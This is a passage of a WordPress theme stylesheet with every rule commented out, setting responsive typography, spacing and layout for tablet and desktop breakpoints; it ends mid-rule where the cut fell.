/*.main-navigation ul {*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*border-bottom: 1px solid rgba(51, 51, 51, 0.1);*/ /*}*/ /*.main-navigation ul ul {*/ /*border-top: 0;*/ /*border-bottom: 0;*/ /*}*/ /*.social-navigation {*/ /*margin-bottom: 11.1111%;*/ /*}*/ /*.social-navigation {*/ /*margin-top: 0;*/ /*}*/ /*.widget-area {*/ /*margin-top: 0;*/ /*}*/ /*.widget {*/ /*margin-bottom: 11.1111%;*/ /*}*/ /*.site-main {*/ /*padding: 7.6923% 0;*/ /*}*/ /*.hentry.sticky:not(.has-post-thumbnail) {*/ /*padding-top: inherit;*/ /*}*/ /*.hentry,*/ /*.page-header,*/ /*.page-content {*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 0 7.6923%;*/ /*}*/ /*.hentry + .hentry,*/ /*.page-header + .hentry,*/ /*.page-header + .page-content {*/ /*margin-top: 7.6923%;*/ /*}*/ /*.hentry + .hentry {*/ /*border-top: 0;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 2.4em;*/ /*}*/ /*.entry-header {*/ /*padding: 0 9.0909%;*/ /*}*/ /*.entry-content,*/ /*.entry-summary {*/ /*padding: 0 9.0909% 9.0909%;*/ /*}*/ /*.entry-footer {*/ /*padding: 4.5454% 9.0909%;*/ /*}*/ /*.page-header {*/ /*border-bottom: 0;*/ /*border-left: 7px solid #333;*/ /*padding: 3.8461% 7.6923%;*/ /*}*/ /*.page-title,*/ /*.taxonomy-description {*/ /*margin-left: -7px;*/ /*}*/ /*.page-content {*/ /*padding: 9.0909%;*/ /*}*/ /*.site-footer {*/ /*border-top: 0;*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 0 7.6923%;*/ /*padding: 3.84615% 7.6923%;*/ /*}*/ /*.post-navigation {*/ /*border-top: 0;*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 7.6923% 7.6923% 0;*/ /*}*/ /*.post-navigation a {*/ /*padding: 4.5454% 9.0909%;*/ /*}*/ /*.pagination {*/ /*border-top: 0;*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 7.6923% 7.6923% 0;*/ /*padding: 0;*/ /*}*/ /*/!* restore screen-reader-text *!/*/ /*.pagination .current .screen-reader-text {*/ /*position: absolute !important;*/ /*}*/ /*.pagination .page-numbers {*/ /*display: inline-block;*/ /*}*/ /*.image-navigation {*/ /*padding: 0 9.0909%;*/ /*}*/ /*.comments-area {*/ /*border-top: 0;*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 7.6923% 7.6923% 0;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-left: 0;*/ /*}*/ /*.comment-content li > ul,*/ /*.comment-content li > ol,*/ /*.comment-content blockquote > ul,*/ /*.comment-content blockquote > ol {*/ /*margin-left: 1.3333em;*/ /*}*/ /*.widecolumn {*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 7.6923%;*/ /*}*/ /*}*/ /*/!***/ /** 16.2 Tablet Small 740px*/ /**!/*/ /*@media screen and (min-width: 46.25em) {*/ /*body,*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.6471;*/ /*}*/ /*button,*/ /*input {*/ /*line-height: normal;*/ /*}*/ /*p,*/ /*address,*/ /*pre,*/ /*hr,*/ /*ul,*/ /*ol,*/ /*dl,*/ /*dd,*/ /*table {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*blockquote {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.75;*/ /*margin-bottom: 1.75em;*/ /*margin-left: -1.05em;*/ /*padding-left: 0.85em;*/ /*}*/ /*blockquote p {*/ /*margin-bottom: 1.75em;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.6471;*/ /*}*/ /*pre {*/ /*line-height: 1.2353;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"],*/ /*.post-password-form input[type="submit"],*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*padding: 0.8214em 1.6429em;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.5em;*/ /*}*/ /*.main-navigation {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*line-height: 1.5;*/ /*}*/ /*.main-navigation a {*/ /*padding: 1em 0;*/ /*}*/ /*.main-navigation ul ul {*/ /*margin-left: 1em;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*line-height: 1.5;*/ /*}*/ /*.social-navigation ul {*/ /*margin-bottom: -1.4706em;*/ /*}*/ /*.social-navigation a {*/ /*height: 2.8824em;*/ /*width: 2.8824em;*/ /*}*/ /*.secondary-toggle {*/ /*height: 56px;*/ /*width: 56px;*/ /*}*/ /*.secondary-toggle:before {*/ /*line-height: 54px;*/ /*width: 54px;*/ /*}*/ /*.post-password-form label,*/ /*.post-navigation .meta-nav,*/ /*.image-navigation,*/ /*.comment-navigation,*/ /*.author-heading,*/ /*.author-bio,*/ /*.entry-footer,*/ /*.page-links a,*/ /*.page-links span,*/ /*.comment-metadata,*/ /*.pingback .edit-link,*/ /*.comment-list .reply,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.comment-form label,*/ /*.form-allowed-tags,*/ /*.site-info,*/ /*.wp-caption-text,*/ /*.gallery-caption,*/ /*.entry-caption,*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.2941em;*/ /*}*/ /*.pagination .page-numbers {*/ /*line-height: 3.2941em;*/ /*padding: 0 0.8235em;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*height: 56px;*/ /*padding: 0;*/ /*width: 56px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*height: 56px;*/ /*line-height: 56px;*/ /*width: 56px;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-next a:after {*/ /*top: 2px;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4118em 1.6471em 1.6471em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4118em 0 1.6471em 1.6471em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*margin-top: 0.4118em;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2353em;*/ /*}*/ /*.site-branding {*/ /*min-height: 3.7059em;*/ /*padding-right: 66px;*/ /*}*/ /*.site-title {*/ /*font-size: 29px;*/ /*font-size: 2.9rem;*/ /*line-height: 1.2069;*/ /*}*/ /*.site-description {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.widget {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*line-height: 1.5;*/ /*}*/ /*.widget p,*/ /*.widget address,*/ /*.widget hr,*/ /*.widget ul,*/ /*.widget ol,*/ /*.widget dl,*/ /*.widget dd,*/ /*.widget table,*/ /*.widget pre {*/ /*margin-bottom: 1.5em;*/ /*}*/ /*.widget li > ul,*/ /*.widget li > ol {*/ /*margin-bottom: 0;*/ /*}*/ /*.widget blockquote {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.6471;*/ /*margin-bottom: 1.6471em;*/ /*margin-left: -1.2353em;*/ /*padding-left: 1em;*/ /*}*/ /*.widget blockquote p {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.widget blockquote cite,*/ /*.widget blockquote small {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*line-height: 1.5;*/ /*}*/ /*.widget blockquote > blockquote {*/ /*margin-left: 0;*/ /*}*/ /*.widget pre {*/ /*line-height: 1.5;*/ /*padding: 0.75em;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*line-height: 1.75;*/ /*}*/ /*.widget button,*/ /*.widget input {*/ /*line-height: normal;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*padding: 0.8214em 1.6429em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.5625em;*/ /*}*/ /*.widget blockquote.alignleft,*/ /*.widget .wp-caption.alignleft,*/ /*.widget img.alignleft {*/ /*margin: 0.5em 1.5em 1.5em 0;*/ /*}*/ /*.widget blockquote.alignright,*/ /*.widget .wp-caption.alignright,*/ /*.widget img.alignright {*/ /*margin: 0.5em 0 1.5em 1.5em;*/ /*}*/ /*.widget blockquote.aligncenter,*/ /*.widget .wp-caption.aligncenter,*/ /*.widget img.aligncenter {*/ /*margin-top: 0.5em;*/ /*margin-bottom: 1.5em;*/ /*}*/ /*.widget .wp-caption.alignleft,*/ /*.widget .wp-caption.alignright,*/ /*.widget .wp-caption.aligncenter {*/ /*margin-bottom: 1em;*/ /*}*/ /*.widget-title {*/ /*margin: 0 0 1.5em;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 2.9286;*/ /*}*/ /*.widget_calendar caption {*/ /*margin: 0 0 1.5em;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*padding: 0.9643em 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*margin: 0.9643em 0 0 1em;*/ /*padding-top: 0.9643em;*/ /*}*/ /*.widget_rss li {*/ /*margin-bottom: 1.5em;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*line-height: 1.75;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 3em;*/ /*}*/ /*.entry-title,*/ /*.widecolumn h2 {*/ /*font-size: 35px;*/ /*font-size: 3.5rem;*/ /*line-height: 1.2;*/ /*margin-bottom: 1.2em;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 35px;*/ /*font-size: 3.5rem;*/ /*line-height: 1.2;*/ /*margin-top: 1.6em;*/ /*margin-bottom: 0.8em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 29px;*/ /*font-size: 2.9rem;*/ /*line-height: 1.2069;*/ /*margin-top: 1.931em;*/ /*margin-bottom: 0.9655em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 24px;*/ /*font-size: 2.4rem;*/ /*line-height: 1.1667;*/ /*margin-top: 2.3333em;*/ /*margin-bottom: 1.1667em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-summary h4,*/ /*.page-content h4,*/ /*.comment-content h4 {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.4;*/ /*margin-top: 2.8em;*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.2353;*/ /*margin-top: 3.2941em;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*font-size: 24px;*/ /*top: 2px;*/ /*}*/ /*.author-info {*/ /*margin: 0 9.0909%;*/ /*padding: 9.0909% 0;*/ /*}*/ /*.author-info .avatar {*/ /*height: 42px;*/ /*margin: 0 1.6471em 1.6471em 0;*/ /*width: 42px;*/ /*}*/ /*.author-link:after {*/ /*top: 3px;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*top: 3px;*/ /*}*/ /*.taxonomy-description {*/ /*padding-top: 0.4118em;*/ /*}*/ /*.page-title,*/ /*.comments-title,*/ /*.comment-reply-title,*/ /*.post-navigation .post-title {*/ /*font-size: 24px;*/ /*font-size: 2.4rem;*/ /*line-height: 1.1667;*/ /*}*/ /*.page-links {*/ /*margin-bottom: 1.4117em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*margin: 0 0.2857em 0.2857em 0;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.4;*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*top: 0.0833em;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*padding: 1.6471em 0;*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6471em;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 1.2353em;*/ /*}*/ /*.comment-meta {*/ /*position: relative;*/ /*}*/ /*.comment-author {*/ /*margin-bottom: 0;*/ /*}*/ /*.comment-author .avatar {*/ /*height: 42px;*/ /*margin-right: 1.64705em;*/ /*position: relative;*/ /*top: 5px;*/ /*width: 42px;*/ /*}*/ /*.comment-metadata .edit-link:before {*/ /*top: 2px;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 6px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*top: 7px;*/ /*left: 6px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.comment-list .reply a {*/ /*padding: 0.4286em 0.8571em;*/ /*}*/ /*.comment-form,*/ /*.no-comments {*/ /*padding-top: 1.6471em;*/ /*}*/ /*.comment-reply-title small a:before {*/ /*top: -1px;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-caption,*/ /*.gallery {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6471em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.6em;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: normal;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.4117em;*/ /*}*/ /*}*/ /*/!***/ /** 16.3 Tablet Large 880px*/ /**!/*/ /*@media screen and (min-width: 55em) {*/ /*body,*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.6842;*/ /*}*/ /*button,*/ /*input {*/ /*line-height: normal;*/ /*}*/ /*p,*/ /*address,*/ /*pre,*/ /*hr,*/ /*ul,*/ /*ol,*/ /*dl,*/ /*dd,*/ /*table {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*blockquote {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.8182;*/ /*margin-bottom: 1.8182em;*/ /*margin-left: -1.0909em;*/ /*padding-left: 0.9091em;*/ /*}*/ /*blockquote p {*/ /*margin-bottom: 1.8182em;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.6842;*/ /*}*/ /*pre {*/ /*line-height: 1.2632;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"],*/ /*.post-password-form input[type="submit"],*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*padding: 0.8125em 1.625em;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.5278em;*/ /*}*/ /*.main-navigation {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*line-height: 1.5;*/ /*}*/ /*.main-navigation a {*/ /*padding: 0.75em 0;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*line-height: 1.5;*/ /*}*/ /*.social-navigation ul {*/ /*margin-bottom: -1.2632em;*/ /*}*/ /*.social-navigation a {*/ /*height: 2.5263em;*/ /*width: 2.5263em;*/ /*}*/ /*.secondary-toggle {*/ /*height: 64px;*/ /*width: 64px;*/ /*}*/ /*.secondary-toggle:before {*/ /*line-height: 62px;*/ /*width: 62px;*/ /*}*/ /*.post-password-form label,*/ /*.post-navigation .meta-nav,*/ /*.comment-navigation,*/ /*.image-navigation,*/ /*.author-heading,*/ /*.author-bio,*/ /*.entry-footer,*/ /*.page-links a,*/ /*.page-links span,*/ /*.comment-metadata,*/ /*.pingback .edit-link,*/ /*.comment-list .reply,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.comment-form label,*/ /*.form-allowed-tags,*/ /*.site-info,*/ /*.wp-caption-text,*/ /*.gallery-caption,*/ /*.entry-caption,*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.3684em;*/ /*}*/ /*.pagination .page-numbers {*/ /*line-height: 3.3684em;*/ /*padding: 0 0.8421em;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*height: 64px;*/ /*padding: 0;*/ /*width: 64px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*height: 64px;*/ /*line-height: 64px;*/ /*width: 64px;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-next a:after {*/ /*font-size: 24px;*/ /*top: -1px;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4211em 1.6842em 1.6842em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4211em 0 1.6842em 1.6842em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*margin-top: 0.4211em;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2632em;*/ /*}*/ /*.site-branding {*/ /*min-height: 3.7895em;*/ /*padding-right: 74px;*/ /*}*/ /*.site-title {*/ /*font-size: 32px;*/ /*font-size: 3.2rem;*/ /*line-height: 1.25;*/ /*}*/ /*.site-description {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget blockquote {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.6842;*/ /*margin-bottom: 1.6842em;*/ /*margin-left: -1.2632em;*/ /*padding-left: 1.0526em;*/ /*}*/ /*.widget blockquote p {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.widget blockquote cite,*/ /*.widget blockquote small {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*line-height: 1.5;*/ /*}*/ /*.widget button,*/ /*.widget input {*/ /*line-height: normal;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*padding: 0.8125em 1.625em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.75em;*/ /*}*/ /*.widget .wp-caption-text,*/ /*.widget .gallery-caption {*/ /*line-height: 1.5;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 2.9375;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*padding: 0.7188em 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*margin: 0.7188em 0 0 1em;*/ /*padding-top: 0.7188em;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*line-height: 1.8462;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 2.9474em;*/ /*}*/ /*.entry-title,*/ /*.widecolumn h2 {*/ /*font-size: 39px;*/ /*font-size: 3.9rem;*/ /*line-height: 1.2308;*/ /*margin-bottom: 1.2308em;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 39px;*/ /*font-size: 3.9rem;*/ /*line-height: 1.2308;*/ /*margin-top: 1.641em;*/ /*margin-bottom: 0.8205em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 32px;*/ /*font-size: 3.2rem;*/ /*line-height: 1.25;*/ /*margin-top: 2em;*/ /*margin-bottom: 1em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 27px;*/ /*font-size: 2.7rem;*/ /*line-height: 1.1852;*/ /*margin-top: 2.3704em;*/ /*margin-bottom: 1.1852em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-summary h4,*/ /*.page-content h4,*/ /*.comment-content h4 {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.4545;*/ /*margin-top: 2.9091em;*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.2632;*/ /*margin-top: 3.3684em;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*top: 3px;*/ /*}*/ /*.author-info .avatar {*/ /*height: 56px;*/ /*margin: 0 1.6842em 1.6842em 0;*/ /*width: 56px;*/ /*}*/ /*.author-link:after {*/ /*font-size: 24px;*/ /*top: 0;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*top: 4px;*/ /*}*/ /*.taxonomy-description {*/ /*padding-top: 0.4211em;*/ /*}*/ /*.page-title,*/ /*.comments-title,*/ /*.comment-reply-title,*/ /*.post-navigation .post-title {*/ /*font-size: 27px;*/ /*font-size: 2.7rem;*/ /*line-height: 1.1852;*/ /*}*/ /*.page-links {*/ /*margin-bottom: 1.4736em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*margin: 0 0.25em 0.25em 0;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6842em*/ /*}*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.4545;*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*top: 0.125em;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*padding: 1.6842em 0;*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6842em;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 1.4737em;*/ /*}*/ /*.comment-author .avatar {*/ /*height: 56px;*/ /*margin-right: 1.6842em;*/ /*top: 3px;*/ /*width: 56px;*/ /*}*/ /*.comment-metadata {*/ /*line-height: 2;*/ /*}*/ /*.comment-metadata .edit-link:before {*/ /*top: 8px;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 8px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*top: 8px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.comment-list .reply a {*/ /*padding: 0.4375em 0.875em;*/ /*}*/ /*.comment-form,*/ /*.no-comments {*/ /*padding-top: 1.6842em;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-caption,*/ /*.gallery {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6842em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.641em;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.421em;*/ /*}*/ /*}*/ /*/!***/ /** 16.4 Desktop Small 955px*/ /**!/*/ /*@media screen and (min-width: 59.6875em) {*/ /*body:before {*/ /*background-color: #fff;*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*content: "";*/ /*display: block;*/ /*height: 100%;*/ /*min-height: 100%;*/ /*position: fixed;*/ /*top: 0;*/ /*left: 0;*/ /*width: 29.4118%;*/ /*z-index: 0; /!* Fixes flashing bug with scrolling on Safari *!/*/ /*}*/ /*.site {*/ /*margin: 0 auto;*/ /*max-width: 1403px;*/ /*}*/ /*.sidebar {*/ /*float: left;*/ /*margin-right: -100%;*/ /*max-width: 413px;*/ /*position: relative;*/ /*width: 29.4118%;*/ /*}*/ /*.secondary {*/ /*background-color: transparent;*/ /*box-shadow: none;*/ /*display: block;*/ /*margin: 0;*/ /*padding: 0;*/ /*}*/ /*.site-main {*/ /*padding: 8.3333% 0;*/ /*}*/ /*.site-content {*/ /*display: block;*/ /*float: left;*/ /*margin-left: 29.4118%;*/ /*width: 70.5882%;*/ /*}*/ /*body {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*line-height: 